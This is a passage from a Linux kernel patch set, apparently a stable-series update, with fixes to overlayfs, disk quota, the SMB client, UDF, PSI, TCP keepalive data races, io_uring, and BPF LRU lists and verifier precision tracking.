+@@ -32,6 +32,7 @@ struct ovl_sb {
+ };
+ 
+ struct ovl_layer {
++	/* ovl_free_fs() relies on @mnt being the first member! */
+ 	struct vfsmount *mnt;
+ 	/* Trap in ovl inode cache */
+ 	struct inode *trap;
+@@ -42,6 +43,14 @@ struct ovl_layer {
+ 	int fsid;
+ };
+ 
++/*
++ * ovl_free_fs() relies on @mnt being the first member when unmounting
++ * the private mounts created for each layer. Let's check both the
++ * offset and type.
++ */
++static_assert(offsetof(struct ovl_layer, mnt) == 0);
++static_assert(__same_type(typeof_member(struct ovl_layer, mnt), struct vfsmount *));
++
+ struct ovl_path {
+ 	const struct ovl_layer *layer;
+ 	struct dentry *dentry;
+diff --git a/fs/quota/dquot.c b/fs/quota/dquot.c
+index f27faf5db5544..46dca88d89c36 100644
+--- a/fs/quota/dquot.c
++++ b/fs/quota/dquot.c
+@@ -555,7 +555,7 @@ restart:
+ 			continue;
+ 		/* Wait for dquot users */
+ 		if (atomic_read(&dquot->dq_count)) {
+-			dqgrab(dquot);
++			atomic_inc(&dquot->dq_count);
+ 			spin_unlock(&dq_list_lock);
+ 			/*
+ 			 * Once dqput() wakes us up, we know it's time to free
+@@ -2420,7 +2420,8 @@ int dquot_load_quota_sb(struct super_block *sb, int type, int format_id,
+ 
+ 	error = add_dquot_ref(sb, type);
+ 	if (error)
+-		dquot_disable(sb, type, flags);
++		dquot_disable(sb, type,
++			      DQUOT_USAGE_ENABLED | DQUOT_LIMITS_ENABLED);
+ 
+ 	return error;
+ out_fmt:
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index 935fe198a4baf..cbe08948baf4a 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -59,7 +59,7 @@ extern bool disable_legacy_dialects;
+ #define TLINK_IDLE_EXPIRE	(600 * HZ)
+ 
+ /* Drop the connection to not overload the server */
+-#define NUM_STATUS_IO_TIMEOUT   5
++#define MAX_STATUS_IO_TIMEOUT   5
+ 
+ struct mount_ctx {
+ 	struct cifs_sb_info *cifs_sb;
+@@ -1162,6 +1162,7 @@ cifs_demultiplex_thread(void *p)
+ 	struct mid_q_entry *mids[MAX_COMPOUND];
+ 	char *bufs[MAX_COMPOUND];
+ 	unsigned int noreclaim_flag, num_io_timeout = 0;
++	bool pending_reconnect = false;
+ 
+ 	noreclaim_flag = memalloc_noreclaim_save();
+ 	cifs_dbg(FYI, "Demultiplex PID: %d\n", task_pid_nr(current));
+@@ -1201,6 +1202,8 @@ cifs_demultiplex_thread(void *p)
+ 		cifs_dbg(FYI, "RFC1002 header 0x%x\n", pdu_length);
+ 		if (!is_smb_response(server, buf[0]))
+ 			continue;
++
++		pending_reconnect = false;
+ next_pdu:
+ 		server->pdu_size = pdu_length;
+ 
+@@ -1258,10 +1261,13 @@ next_pdu:
+ 		if (server->ops->is_status_io_timeout &&
+ 		    server->ops->is_status_io_timeout(buf)) {
+ 			num_io_timeout++;
+-			if (num_io_timeout > NUM_STATUS_IO_TIMEOUT) {
+-				cifs_reconnect(server, false);
++			if (num_io_timeout > MAX_STATUS_IO_TIMEOUT) {
++				cifs_server_dbg(VFS,
++						"Number of request timeouts exceeded %d. Reconnecting",
++						MAX_STATUS_IO_TIMEOUT);
++
++				pending_reconnect = true;
+ 				num_io_timeout = 0;
+-				continue;
+ 			}
+ 		}
+ 
+@@ -1308,6 +1314,11 @@ next_pdu:
+ 			buf = server->smallbuf;
+ 			goto next_pdu;
+ 		}
++
++		/* do this reconnect at the very end after processing all MIDs */
++		if (pending_reconnect)
++			cifs_reconnect(server, true);
++
+ 	} /* end while !EXITING */
+ 
+ 	/* buffer usually freed in free_mid - need to free it here on exit */
+diff --git a/fs/udf/unicode.c b/fs/udf/unicode.c
+index 622569007b530..2142cbd1dde24 100644
+--- a/fs/udf/unicode.c
++++ b/fs/udf/unicode.c
+@@ -247,7 +247,7 @@ static int udf_name_from_CS0(struct super_block *sb,
+ 	}
+ 
+ 	if (translate) {
+-		if (str_o_len <= 2 && str_o[0] == '.' &&
++		if (str_o_len > 0 && str_o_len <= 2 && str_o[0] == '.' &&
+ 		    (str_o_len == 1 || str_o[1] == '.'))
+ 			needsCRC = 1;
+ 		if (needsCRC) {
+diff --git a/include/drm/display/drm_dp_mst_helper.h b/include/drm/display/drm_dp_mst_helper.h
+index 32c764fb9cb56..40e855c8407cf 100644
+--- a/include/drm/display/drm_dp_mst_helper.h
++++ b/include/drm/display/drm_dp_mst_helper.h
+@@ -815,8 +815,11 @@ void drm_dp_mst_topology_mgr_destroy(struct drm_dp_mst_topology_mgr *mgr);
+ bool drm_dp_read_mst_cap(struct drm_dp_aux *aux, const u8 dpcd[DP_RECEIVER_CAP_SIZE]);
+ int drm_dp_mst_topology_mgr_set_mst(struct drm_dp_mst_topology_mgr *mgr, bool mst_state);
+ 
+-int drm_dp_mst_hpd_irq(struct drm_dp_mst_topology_mgr *mgr, u8 *esi, bool *handled);
+-
++int drm_dp_mst_hpd_irq_handle_event(struct drm_dp_mst_topology_mgr *mgr,
++				    const u8 *esi,
++				    u8 *ack,
++				    bool *handled);
++void drm_dp_mst_hpd_irq_send_new_request(struct drm_dp_mst_topology_mgr *mgr);
+ 
+ int
+ drm_dp_mst_detect_port(struct drm_connector *connector,
+diff --git a/include/linux/psi.h b/include/linux/psi.h
+index b029a847def1e..e0745873e3f26 100644
+--- a/include/linux/psi.h
++++ b/include/linux/psi.h
+@@ -23,8 +23,9 @@ void psi_memstall_enter(unsigned long *flags);
+ void psi_memstall_leave(unsigned long *flags);
+ 
+ int psi_show(struct seq_file *s, struct psi_group *group, enum psi_res res);
+-struct psi_trigger *psi_trigger_create(struct psi_group *group,
+-			char *buf, enum psi_res res);
++struct psi_trigger *psi_trigger_create(struct psi_group *group, char *buf,
++				       enum psi_res res, struct file *file,
++				       struct kernfs_open_file *of);
+ void psi_trigger_destroy(struct psi_trigger *t);
+ 
+ __poll_t psi_trigger_poll(void **trigger_ptr, struct file *file,
+diff --git a/include/linux/psi_types.h b/include/linux/psi_types.h
+index 14a1ebb74e11f..f1fd3a8044e0e 100644
+--- a/include/linux/psi_types.h
++++ b/include/linux/psi_types.h
+@@ -72,6 +72,9 @@ enum psi_states {
+ /* Use one bit in the state mask to track TSK_ONCPU */
+ #define PSI_ONCPU	(1 << NR_PSI_STATES)
+ 
++/* Flag whether to re-arm avgs_work, see details in get_recent_times() */
++#define PSI_STATE_RESCHEDULE	(1 << (NR_PSI_STATES + 1))
++
+ enum psi_aggregators {
+ 	PSI_AVGS = 0,
+ 	PSI_POLL,
+@@ -134,6 +137,9 @@ struct psi_trigger {
+ 	/* Wait queue for polling */
+ 	wait_queue_head_t event_wait;
+ 
++	/* Kernfs file for cgroup triggers */
++	struct kernfs_open_file *of;
++
+ 	/* Pending event flag */
+ 	int event;
+ 
+@@ -148,6 +154,9 @@ struct psi_trigger {
+ 
+ 	/* Deferred event(s) from previous ratelimit window */
+ 	bool pending_event;
++
++	/* Trigger type - PSI_AVGS for unprivileged, PSI_POLL for RT */
++	enum psi_aggregators aggregator;
+ };
+ 
+ struct psi_group {
+@@ -168,30 +177,34 @@ struct psi_group {
+ 	/* Aggregator work control */
+ 	struct delayed_work avgs_work;
+ 
++	/* Unprivileged triggers against N*PSI_FREQ windows */
++	struct list_head avg_triggers;
++	u32 avg_nr_triggers[NR_PSI_STATES - 1];
++
+ 	/* Total stall times and sampled pressure averages */
+ 	u64 total[NR_PSI_AGGREGATORS][NR_PSI_STATES - 1];
+ 	unsigned long avg[NR_PSI_STATES - 1][3];
+ 
+-	/* Monitor work control */
+-	struct task_struct __rcu *poll_task;
+-	struct timer_list poll_timer;
+-	wait_queue_head_t poll_wait;
+-	atomic_t poll_wakeup;
+-	atomic_t poll_scheduled;
++	/* Monitor RT polling work control */
++	struct task_struct __rcu *rtpoll_task;
++	struct timer_list rtpoll_timer;
++	wait_queue_head_t rtpoll_wait;
++	atomic_t rtpoll_wakeup;
++	atomic_t rtpoll_scheduled;
+ 
+ 	/* Protects data used by the monitor */
+-	struct mutex trigger_lock;
+-
+-	/* Configured polling triggers */
+-	struct list_head triggers;
+-	u32 nr_triggers[NR_PSI_STATES - 1];
+-	u32 poll_states;
+-	u64 poll_min_period;
+-
+-	/* Total stall times at the start of monitor activation */
+-	u64 polling_total[NR_PSI_STATES - 1];
+-	u64 polling_next_update;
+-	u64 polling_until;
++	struct mutex rtpoll_trigger_lock;
++
++	/* Configured RT polling triggers */
++	struct list_head rtpoll_triggers;
++	u32 rtpoll_nr_triggers[NR_PSI_STATES - 1];
++	u32 rtpoll_states;
++	u64 rtpoll_min_period;
++
++	/* Total stall times at the start of RT polling monitor activation */
++	u64 rtpoll_total[NR_PSI_STATES - 1];
++	u64 rtpoll_next_update;
++	u64 rtpoll_until;
+ };
+ 
+ #else /* CONFIG_PSI */
+diff --git a/include/linux/tcp.h b/include/linux/tcp.h
+index 41b1da621a458..9cd289ad3f5b5 100644
+--- a/include/linux/tcp.h
++++ b/include/linux/tcp.h
+@@ -510,7 +510,7 @@ static inline void fastopen_queue_tune(struct sock *sk, int backlog)
+ 	struct request_sock_queue *queue = &inet_csk(sk)->icsk_accept_queue;
+ 	int somaxconn = READ_ONCE(sock_net(sk)->core.sysctl_somaxconn);
+ 
+-	queue->fastopenq.max_qlen = min_t(unsigned int, backlog, somaxconn);
++	WRITE_ONCE(queue->fastopenq.max_qlen, min_t(unsigned int, backlog, somaxconn));
+ }
+ 
+ static inline void tcp_move_syn(struct tcp_sock *tp,
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index 84c5ce57eab69..ddbcbf9ccb2ce 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -807,6 +807,7 @@ struct hci_conn_params {
+ 
+ 	struct hci_conn *conn;
+ 	bool explicit_connect;
++	/* Accessed without hdev->lock: */
+ 	hci_conn_flags_t flags;
+ 	u8  privacy_mode;
+ };
+@@ -1536,7 +1537,11 @@ struct hci_conn_params *hci_conn_params_add(struct hci_dev *hdev,
+ 					    bdaddr_t *addr, u8 addr_type);
+ void hci_conn_params_del(struct hci_dev *hdev, bdaddr_t *addr, u8 addr_type);
+ void hci_conn_params_clear_disabled(struct hci_dev *hdev);
++void hci_conn_params_free(struct hci_conn_params *param);
+ 
++void hci_pend_le_list_del_init(struct hci_conn_params *param);
++void hci_pend_le_list_add(struct hci_conn_params *param,
++			  struct list_head *list);
+ struct hci_conn_params *hci_pend_le_action_lookup(struct list_head *list,
+ 						  bdaddr_t *addr,
+ 						  u8 addr_type);
+diff --git a/include/net/ip.h b/include/net/ip.h
+index acec504c469a0..83a1a9bc3ceb1 100644
+--- a/include/net/ip.h
++++ b/include/net/ip.h
+@@ -282,7 +282,7 @@ void ip_send_unicast_reply(struct sock *sk, struct sk_buff *skb,
+ 			   const struct ip_options *sopt,
+ 			   __be32 daddr, __be32 saddr,
+ 			   const struct ip_reply_arg *arg,
+-			   unsigned int len, u64 transmit_time);
++			   unsigned int len, u64 transmit_time, u32 txhash);
+ 
+ #define IP_INC_STATS(net, field)	SNMP_INC_STATS64((net)->mib.ip_statistics, field)
+ #define __IP_INC_STATS(net, field)	__SNMP_INC_STATS64((net)->mib.ip_statistics, field)
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 5eedd476a38d7..e9c8f88f47696 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -1511,25 +1511,38 @@ void tcp_leave_memory_pressure(struct sock *sk);
+ static inline int keepalive_intvl_when(const struct tcp_sock *tp)
+ {
+ 	struct net *net = sock_net((struct sock *)tp);
++	int val;
+ 
+-	return tp->keepalive_intvl ? :
+-		READ_ONCE(net->ipv4.sysctl_tcp_keepalive_intvl);
++	/* Paired with WRITE_ONCE() in tcp_sock_set_keepintvl()
++	 * and do_tcp_setsockopt().
++	 */
++	val = READ_ONCE(tp->keepalive_intvl);
++
++	return val ? : READ_ONCE(net->ipv4.sysctl_tcp_keepalive_intvl);
+ }
+ 
+ static inline int keepalive_time_when(const struct tcp_sock *tp)
+ {
+ 	struct net *net = sock_net((struct sock *)tp);
++	int val;
+ 
+-	return tp->keepalive_time ? :
+-		READ_ONCE(net->ipv4.sysctl_tcp_keepalive_time);
++	/* Paired with WRITE_ONCE() in tcp_sock_set_keepidle_locked() */
++	val = READ_ONCE(tp->keepalive_time);
++
++	return val ? : READ_ONCE(net->ipv4.sysctl_tcp_keepalive_time);
+ }
+ 
+ static inline int keepalive_probes(const struct tcp_sock *tp)
+ {
+ 	struct net *net = sock_net((struct sock *)tp);
++	int val;
+ 
+-	return tp->keepalive_probes ? :
+-		READ_ONCE(net->ipv4.sysctl_tcp_keepalive_probes);
++	/* Paired with WRITE_ONCE() in tcp_sock_set_keepcnt()
++	 * and do_tcp_setsockopt().
++	 */
++	val = READ_ONCE(tp->keepalive_probes);
++
++	return val ? : READ_ONCE(net->ipv4.sysctl_tcp_keepalive_probes);
+ }
+ 
+ static inline u32 keepalive_time_elapsed(const struct tcp_sock *tp)
+@@ -2046,7 +2059,11 @@ void __tcp_v4_send_check(struct sk_buff *skb, __be32 saddr, __be32 daddr);
+ static inline u32 tcp_notsent_lowat(const struct tcp_sock *tp)
+ {
+ 	struct net *net = sock_net((struct sock *)tp);
+-	return tp->notsent_lowat ?: READ_ONCE(net->ipv4.sysctl_tcp_notsent_lowat);
++	u32 val;
++
++	val = READ_ONCE(tp->notsent_lowat);
++
++	return val ?: READ_ONCE(net->ipv4.sysctl_tcp_notsent_lowat);
+ }
+ 
+ bool tcp_stream_memory_free(const struct sock *sk, int wake);
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 38bc0073a7d43..bd7b8cf8bc677 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1803,6 +1803,14 @@ fail:
+ 		ret = io_issue_sqe(req, issue_flags);
+ 		if (ret != -EAGAIN)
+ 			break;
++
++		/*
++		 * If REQ_F_NOWAIT is set, then don't wait or retry with
++		 * poll. -EAGAIN is final for that case.
++		 */
++		if (req->flags & REQ_F_NOWAIT)
++			break;
++
+ 		/*
+ 		 * We can get EAGAIN for iopolled IO even though we're
+ 		 * forcing a sync submission from here, since we can't
+diff --git a/kernel/bpf/bpf_lru_list.c b/kernel/bpf/bpf_lru_list.c
+index d99e89f113c43..3dabdd137d102 100644
+--- a/kernel/bpf/bpf_lru_list.c
++++ b/kernel/bpf/bpf_lru_list.c
+@@ -41,7 +41,12 @@ static struct list_head *local_pending_list(struct bpf_lru_locallist *loc_l)
+ /* bpf_lru_node helpers */
+ static bool bpf_lru_node_is_ref(const struct bpf_lru_node *node)
+ {
+-	return node->ref;
++	return READ_ONCE(node->ref);
++}
++
++static void bpf_lru_node_clear_ref(struct bpf_lru_node *node)
++{
++	WRITE_ONCE(node->ref, 0);
+ }
+ 
+ static void bpf_lru_list_count_inc(struct bpf_lru_list *l,
+@@ -89,7 +94,7 @@ static void __bpf_lru_node_move_in(struct bpf_lru_list *l,
+ 
+ 	bpf_lru_list_count_inc(l, tgt_type);
+ 	node->type = tgt_type;
+-	node->ref = 0;
++	bpf_lru_node_clear_ref(node);
+ 	list_move(&node->list, &l->lists[tgt_type]);
+ }
+ 
+@@ -110,7 +115,7 @@ static void __bpf_lru_node_move(struct bpf_lru_list *l,
+ 		bpf_lru_list_count_inc(l, tgt_type);
+ 		node->type = tgt_type;
+ 	}
+-	node->ref = 0;
++	bpf_lru_node_clear_ref(node);
+ 
+ 	/* If the moving node is the next_inactive_rotation candidate,
+ 	 * move the next_inactive_rotation pointer also.
+@@ -353,7 +358,7 @@ static void __local_list_add_pending(struct bpf_lru *lru,
+ 	*(u32 *)((void *)node + lru->hash_offset) = hash;
+ 	node->cpu = cpu;
+ 	node->type = BPF_LRU_LOCAL_LIST_T_PENDING;
+-	node->ref = 0;
++	bpf_lru_node_clear_ref(node);
+ 	list_add(&node->list, local_pending_list(loc_l));
+ }
+ 
+@@ -419,7 +424,7 @@ static struct bpf_lru_node *bpf_percpu_lru_pop_free(struct bpf_lru *lru,
+ 	if (!list_empty(free_list)) {
+ 		node = list_first_entry(free_list, struct bpf_lru_node, list);
+ 		*(u32 *)((void *)node + lru->hash_offset) = hash;
+-		node->ref = 0;
++		bpf_lru_node_clear_ref(node);
+ 		__bpf_lru_node_move(l, node, BPF_LRU_LIST_T_INACTIVE);
+ 	}
+ 
+@@ -522,7 +527,7 @@ static void bpf_common_lru_push_free(struct bpf_lru *lru,
+ 		}
+ 
+ 		node->type = BPF_LRU_LOCAL_LIST_T_FREE;
+-		node->ref = 0;
++		bpf_lru_node_clear_ref(node);
+ 		list_move(&node->list, local_free_list(loc_l));
+ 
+ 		raw_spin_unlock_irqrestore(&loc_l->lock, flags);
+@@ -568,7 +573,7 @@ static void bpf_common_lru_populate(struct bpf_lru *lru, void *buf,
+ 
+ 		node = (struct bpf_lru_node *)(buf + node_offset);
+ 		node->type = BPF_LRU_LIST_T_FREE;
+-		node->ref = 0;
++		bpf_lru_node_clear_ref(node);
+ 		list_add(&node->list, &l->lists[BPF_LRU_LIST_T_FREE]);
+ 		buf += elem_size;
+ 	}
+@@ -594,7 +599,7 @@ again:
+ 		node = (struct bpf_lru_node *)(buf + node_offset);
+ 		node->cpu = cpu;
+ 		node->type = BPF_LRU_LIST_T_FREE;
+-		node->ref = 0;
++		bpf_lru_node_clear_ref(node);
+ 		list_add(&node->list, &l->lists[BPF_LRU_LIST_T_FREE]);
+ 		i++;
+ 		buf += elem_size;
+diff --git a/kernel/bpf/bpf_lru_list.h b/kernel/bpf/bpf_lru_list.h
+index 4ea227c9c1ade..8f3c8b2b4490e 100644
+--- a/kernel/bpf/bpf_lru_list.h
++++ b/kernel/bpf/bpf_lru_list.h
+@@ -64,11 +64,8 @@ struct bpf_lru {
+ 
+ static inline void bpf_lru_node_set_ref(struct bpf_lru_node *node)
+ {
+-	/* ref is an approximation on access frequency.  It does not
+-	 * have to be very accurate.  Hence, no protection is used.
+-	 */
+-	if (!node->ref)
+-		node->ref = 1;
++	if (!READ_ONCE(node->ref))
++		WRITE_ONCE(node->ref, 1);
+ }
+ 
+ int bpf_lru_init(struct bpf_lru *lru, bool percpu, u32 hash_offset,
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index 8633ec4f92df3..0c44a716f0a24 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -5289,7 +5289,8 @@ static int bpf_unpriv_handler(struct ctl_table *table, int write,
+ 		*(int *)table->data = unpriv_enable;
+ 	}
+ 
+-	unpriv_ebpf_notify(unpriv_enable);
++	if (write)
++		unpriv_ebpf_notify(unpriv_enable);
+ 
+ 	return ret;
+ }
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 8c3ededef3172..3c414e0ac819e 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -511,6 +511,15 @@ static bool is_dynptr_ref_function(enum bpf_func_id func_id)
+ 	return func_id == BPF_FUNC_dynptr_data;
+ }
+ 
++static bool is_callback_calling_function(enum bpf_func_id func_id)
++{
++	return func_id == BPF_FUNC_for_each_map_elem ||
++	       func_id == BPF_FUNC_timer_set_callback ||
++	       func_id == BPF_FUNC_find_vma ||
++	       func_id == BPF_FUNC_loop ||
++	       func_id == BPF_FUNC_user_ringbuf_drain;
++}
++
+ static bool helper_multiple_ref_obj_use(enum bpf_func_id func_id,
+ 					const struct bpf_map *map)
+ {
+@@ -1693,7 +1702,7 @@ static void __mark_reg_unknown(const struct bpf_verifier_env *env,
+ 	reg->type = SCALAR_VALUE;
+ 	reg->var_off = tnum_unknown;
+ 	reg->frameno = 0;
+-	reg->precise = env->subprog_cnt > 1 || !env->bpf_capable;
++	reg->precise = !env->bpf_capable;
+ 	__mark_reg_unbounded(reg);
+ }
+ 
+@@ -2670,6 +2679,11 @@ static int backtrack_insn(struct bpf_verifier_env *env, int idx,
+ 			 */
+ 			if (insn->src_reg == BPF_PSEUDO_KFUNC_CALL && insn->imm == 0)
+ 				return -ENOTSUPP;
++			/* BPF helpers that invoke callback subprogs are
++			 * equivalent to BPF_PSEUDO_CALL above
++			 */
++			if (insn->src_reg == 0 && is_callback_calling_function(insn->imm))
++				return -ENOTSUPP;
+ 			/* regular helper call sets R0 */
+ 			*reg_mask &= ~1;
+ 			if (*reg_mask & 0x3f) {
+@@ -2774,8 +2788,11 @@ static void mark_all_scalars_precise(struct bpf_verifier_env *env,
+ 
+ 	/* big hammer: mark all scalars precise in this path.
+ 	 * pop_stack may still get !precise scalars.
++	 * We also skip current state and go straight to first parent state,
++	 * because precision markings in current non-checkpointed state are
++	 * not needed. See why in the comment in __mark_chain_precision below.
+ 	 */
+-	for (; st; st = st->parent)
++	for (st = st->parent; st; st = st->parent) {
+ 		for (i = 0; i <= st->curframe; i++) {
+ 			func = st->frame[i];
+ 			for (j = 0; j < BPF_REG_FP; j++) {
+@@ -2793,8 +2810,121 @@ static void mark_all_scalars_precise(struct bpf_verifier_env *env,
+ 				reg->precise = true;
+ 			}
+ 		}
++	}
++}
++
++static void mark_all_scalars_imprecise(struct bpf_verifier_env *env, struct bpf_verifier_state *st)
++{
++	struct bpf_func_state *func;
++	struct bpf_reg_state *reg;
++	int i, j;
++
++	for (i = 0; i <= st->curframe; i++) {
++		func = st->frame[i];
++		for (j = 0; j < BPF_REG_FP; j++) {
++			reg = &func->regs[j];
++			if (reg->type != SCALAR_VALUE)
++				continue;
++			reg->precise = false;
++		}
++		for (j = 0; j < func->allocated_stack / BPF_REG_SIZE; j++) {
++			if (!is_spilled_reg(&func->stack[j]))
++				continue;
++			reg = &func->stack[j].spilled_ptr;
++			if (reg->type != SCALAR_VALUE)
++				continue;
++			reg->precise = false;
++		}
++	}
+ }
+ 
++/*
++ * __mark_chain_precision() backtracks BPF program instruction sequence and
++ * chain of verifier states making sure that register *regno* (if regno >= 0)
++ * and/or stack slot *spi* (if spi >= 0) are marked as precisely tracked
++ * SCALARS, as well as any other registers and slots that contribute to
++ * a tracked state of given registers/stack slots, depending on specific BPF
++ * assembly instructions (see backtrack_insns() for exact instruction handling
++ * logic). This backtracking relies on recorded jmp_history and is able to
++ * traverse entire chain of parent states. This process ends only when all the
++ * necessary registers/slots and their transitive dependencies are marked as
++ * precise.
++ *
++ * One important and subtle aspect is that precise marks *do not matter* in
++ * the currently verified state (current state). It is important to understand
++ * why this is the case.
++ *
++ * First, note that current state is the state that is not yet "checkpointed",
++ * i.e., it is not yet put into env->explored_states, and it has no children
++ * states as well. It's ephemeral, and can end up either a) being discarded if
++ * compatible explored state is found at some point or BPF_EXIT instruction is
++ * reached or b) checkpointed and put into env->explored_states, branching out
++ * into one or more children states.
++ *
++ * In the former case, precise markings in current state are completely
++ * ignored by state comparison code (see regsafe() for details). Only
++ * checkpointed ("old") state precise markings are important, and if old
++ * state's register/slot is precise, regsafe() assumes current state's
++ * register/slot as precise and checks value ranges exactly and precisely. If
++ * states turn out to be compatible, current state's necessary precise
++ * markings and any required parent states' precise markings are enforced
++ * after the fact with propagate_precision() logic, after the fact. But it's
++ * important to realize that in this case, even after marking current state
++ * registers/slots as precise, we immediately discard current state. So what
++ * actually matters is any of the precise markings propagated into current
++ * state's parent states, which are always checkpointed (due to b) case above).
++ * As such, for scenario a) it doesn't matter if current state has precise
++ * markings set or not.
++ *
++ * Now, for the scenario b), checkpointing and forking into child(ren)
++ * state(s). Note that before current state gets to checkpointing step, any
++ * processed instruction always assumes precise SCALAR register/slot
++ * knowledge: if precise value or range is useful to prune jump branch, BPF
++ * verifier takes this opportunity enthusiastically. Similarly, when
++ * register's value is used to calculate offset or memory address, exact
++ * knowledge of SCALAR range is assumed, checked, and enforced. So, similar to
++ * what we mentioned above about state comparison ignoring precise markings
++ * during state comparison, BPF verifier ignores and also assumes precise
++ * markings *at will* during instruction verification process. But as verifier
++ * assumes precision, it also propagates any precision dependencies across
++ * parent states, which are not yet finalized, so can be further restricted
++ * based on new knowledge gained from restrictions enforced by their children
++ * states. This is so that once those parent states are finalized, i.e., when
++ * they have no more active children state, state comparison logic in
++ * is_state_visited() would enforce strict and precise SCALAR ranges, if
++ * required for correctness.
++ *
++ * To build a bit more intuition, note also that once a state is checkpointed,
++ * the path we took to get to that state is not important. This is crucial
++ * property for state pruning. When state is checkpointed and finalized at
++ * some instruction index, it can be correctly and safely used to "short
++ * circuit" any *compatible* state that reaches exactly the same instruction
++ * index. I.e., if we jumped to that instruction from a completely different
++ * code path than original finalized state was derived from, it doesn't
++ * matter, current state can be discarded because from that instruction
++ * forward having a compatible state will ensure we will safely reach the
++ * exit. States describe preconditions for further exploration, but completely
++ * forget the history of how we got here.
++ *
++ * This also means that even if we needed precise SCALAR range to get to
++ * finalized state, but from that point forward *that same* SCALAR register is
++ * never used in a precise context (i.e., it's precise value is not needed for
++ * correctness), it's correct and safe to mark such register as "imprecise"
++ * (i.e., precise marking set to false). This is what we rely on when we do
++ * not set precise marking in current state. If no child state requires
++ * precision for any given SCALAR register, it's safe to dictate that it can
++ * be imprecise. If any child state does require this register to be precise,
++ * we'll mark it precise later retroactively during precise markings
++ * propagation from child state to parent states.
++ *
++ * Skipping precise marking setting in current state is a mild version of
++ * relying on the above observation. But we can utilize this property even
++ * more aggressively by proactively forgetting any precise marking in the
++ * current state (which we inherited from the parent state), right before we
++ * checkpoint it and branch off into new child state. This is done by
++ * mark_all_scalars_imprecise() to hopefully get more permissive and generic
++ * finalized states which help in short circuiting more future states.
++ */
+ static int __mark_chain_precision(struct bpf_verifier_env *env, int frame, int regno,
+ 				  int spi)
+ {
+@@ -2812,6 +2942,10 @@ static int __mark_chain_precision(struct bpf_verifier_env *env, int frame, int r
+ 	if (!env->bpf_capable)
+ 		return 0;
+ 
++	/* Do sanity checks against current state of register and/or stack
++	 * slot, but don't set precise flag in current state, as precision
++	 * tracking in the current state is unnecessary.
++	 */
+ 	func = st->frame[frame];
+ 	if (regno >= 0) {
+ 		reg = &func->regs[regno];
+@@ -2819,11 +2953,7 @@ static int __mark_chain_precision(struct bpf_verifier_env *env, int frame, int r
+ 			WARN_ONCE(1, "backtracing misuse");
+ 			return -EFAULT;
+ 		}
+-		if (!reg->precise)
+-			new_marks = true;
+-		else
+-			reg_mask = 0;
+-		reg->precise = true;
++		new_marks = true;
+ 	}
+ 
+ 	while (spi >= 0) {
+@@ -2836,11 +2966,7 @@ static int __mark_chain_precision(struct bpf_verifier_env *env, int frame, int r
+ 			stack_mask = 0;
+ 			break;
+ 		}
+-		if (!reg->precise)
+-			new_marks = true;
+-		else
+-			stack_mask = 0;
+-		reg->precise = true;
++		new_marks = true;
+ 		break;
+ 	}
+ 
+@@ -2848,12 +2974,42 @@ static int __mark_chain_precision(struct bpf_verifier_env *env, int frame, int r
+ 		return 0;
+ 	if (!reg_mask && !stack_mask)
+ 		return 0;
++
+ 	for (;;) {
+ 		DECLARE_BITMAP(mask, 64);
+ 		u32 history = st->jmp_history_cnt;
+ 
+ 		if (env->log.level & BPF_LOG_LEVEL2)
+ 			verbose(env, "last_idx %d first_idx %d\n", last_idx, first_idx);
++
++		if (last_idx < 0) {
++			/* we are at the entry into subprog, which
++			 * is expected for global funcs, but only if
++			 * requested precise registers are R1-R5
++			 * (which are global func's input arguments)
++			 */
++			if (st->curframe == 0 &&
++			    st->frame[0]->subprogno > 0 &&
++			    st->frame[0]->callsite == BPF_MAIN_FUNC &&
++			    stack_mask == 0 && (reg_mask & ~0x3e) == 0) {
++				bitmap_from_u64(mask, reg_mask);
++				for_each_set_bit(i, mask, 32) {
++					reg = &st->frame[0]->regs[i];
++					if (reg->type != SCALAR_VALUE) {
++						reg_mask &= ~(1u << i);
++						continue;
++					}
++					reg->precise = true;
++				}
++				return 0;
++			}
++
++			verbose(env, "BUG backtracing func entry subprog %d reg_mask %x stack_mask %llx\n",
++				st->frame[0]->subprogno, reg_mask, stack_mask);
++			WARN_ONCE(1, "verifier backtracking bug");
++			return -EFAULT;
++		}
++
+ 		for (i = last_idx;;) {
+ 			if (skip_first) {
+ 				err = 0;
+@@ -4288,16 +4444,17 @@ static int update_stack_depth(struct bpf_verifier_env *env,
+  * Since recursion is prevented by check_cfg() this algorithm
+  * only needs a local stack of MAX_CALL_FRAMES to remember callsites
+  */
+-static int check_max_stack_depth(struct bpf_verifier_env *env)
++static int check_max_stack_depth_subprog(struct bpf_verifier_env *env, int idx)
+ {
+-	int depth = 0, frame = 0, idx = 0, i = 0, subprog_end;
+ 	struct bpf_subprog_info *subprog = env->subprog_info;
+ 	struct bpf_insn *insn = env->prog->insnsi;
++	int depth = 0, frame = 0, i, subprog_end;
+ 	bool tail_call_reachable = false;
+ 	int ret_insn[MAX_CALL_FRAMES];
+ 	int ret_prog[MAX_CALL_FRAMES];
+ 	int j;
+ 
++	i = subprog[idx].start;
+ process_func:
+ 	/* protect against potential stack overflow that might happen when
+ 	 * bpf2bpf calls get combined with tailcalls. Limit the caller's stack
+@@ -4336,7 +4493,7 @@ process_func:
+ continue_func:
+ 	subprog_end = subprog[idx + 1].start;
+ 	for (; i < subprog_end; i++) {
+-		int next_insn;
++		int next_insn, sidx;
+ 
+ 		if (!bpf_pseudo_call(insn + i) && !bpf_pseudo_func(insn + i))
+ 			continue;
+@@ -4346,14 +4503,14 @@ continue_func:
+ 
+ 		/* find the callee */
+ 		next_insn = i + insn[i].imm + 1;
+-		idx = find_subprog(env, next_insn);
+-		if (idx < 0) {
++		sidx = find_subprog(env, next_insn);
++		if (sidx < 0) {
+ 			WARN_ONCE(1, "verifier bug. No program starts at insn %d\n",
+ 				  next_insn);
